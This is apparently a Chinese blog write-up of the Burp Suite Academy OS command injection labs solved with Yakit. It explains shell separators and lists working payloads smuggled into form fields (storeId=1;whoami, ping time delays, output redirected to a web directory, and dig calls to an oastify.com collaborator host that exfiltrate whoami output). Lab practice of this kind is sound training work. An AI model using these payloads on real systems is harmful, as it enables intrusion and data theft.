靶场 | 1分钟内
Yakit打BurpSuite靶场—命令注入篇
三月 23, 2025
命令注入

; 顺序执行命令,无论前一个命令是否成功。

& 将命令放入后台执行,不阻塞当前 Shell。

&& 前一条命令成功(退出码 0)才执行后续命令。

|| 前一条命令失败(退出码非 0)才执行后续命令。

| 将前一个命令的输出作为后一个命令的输入。

Lab 1

OS command injection, simple case

http
1storeId=1;whoami

http
1storeId=1|whoami

Lab 2

Blind OS command injection with time delays

http
1email=q%40q.com||ping -c 10 127.0.0.1||

http
1email=q%40q.com||ping -c 10 127.0.0.1;

Lab 3

Blind OS command injection with output redirection

http
1email=q%40q.com||whoami>/var/www/images/yak.txt||

Lab 4

Blind OS command injection with out-of-band interaction

http
1email=q%40q.com||dig `whoami`.example.oastify.com||

Lab 5

Blind OS command injection with out-of-band data exfiltratio

http
1email=q%40q.com||dig `whoami`.example.oastify.com||